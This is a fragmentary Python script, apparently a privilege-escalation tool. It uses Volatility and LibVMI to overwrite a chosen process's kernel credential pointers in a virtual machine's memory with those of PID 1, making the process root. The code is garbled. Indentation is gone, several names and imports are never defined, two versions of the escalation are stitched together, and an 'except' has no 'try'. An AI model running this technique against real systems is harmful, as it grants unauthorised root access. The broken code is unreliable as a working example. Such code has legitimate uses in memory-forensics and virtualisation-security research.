import volatility.obj as obj
import volatility.addrspace as addrspace
import volatility.registry as registry
registry.PluginImporter()
registry.register_global_options(config, addrspace.BaseAddressSpace)
## Main program starts here:
# Initialize address space (same as a=addrspace() in linux_volshell)
a=utils.load_as(config)
p=a.profile
# Lookup kernel symbol pointing to first task
task_addr = p.get_symbol("init_task")
# Create python object for this task
# Note that the "init_task" symbol does not point to the start of the
# task_struct data structure "list" element of the data structures.
init_task = obj.Object("task_struct", vm=a, offset=task_addr)
l = list(init_task.tasks)
from libvmi import Libvmi
vmi = Libvmi(sys.argv[5])
t_cred_init = l[0].real_cred
for t in l:
if (t.pid == int(sys.argv[6])):
t_cred_pa = a.vtop(t.real_cred.obj_offset)
vmi.write_64_pa(t_cred_pa, t_cred_init)
target_task = get_task(addr_space, target_pid)
if not target_task:
print("Task with PID {} not found!".format(target_pid))
sys.exit()
# Get a task with root permissions, PID 1 is reliably root always
task_with_root = get_task(addr_space, 1)
# Get Physical addresses for root task credentials pointers
root_real_cred_pa, root_cred_pa = get_credentails_pa(
addr_space, task_with_root)
# Get physical addresses for target task credentials pointers
target_real_cred_pa, target_cred_pa = get_credentails_pa(
addr_space, target_task)
# Initialize libvmi for writing. Note: the library initialize undesired "[][][]"
vmi = Libvmi(pvm_name)
# Write root "cred" pointer value to "cred" attribute of the target task
root_cred_pointer = addr_space.read_long_long_phys(root_cred_pa)
vmi.write_64_pa(target_cred_pa, root_cred_pointer)
# Write root "real_cred" pointer value to "real_cred" attribute of the target task
root_real_cred_pointer = addr_space.read_long_long_phys(root_real_cred_pa)
vmi.write_64_pa(target_real_cred_pa, root_real_cred_pointer)
print("\nSuccess!")
except Exception as e:
print("\nFailed to change UID: {}".format(str(e)))
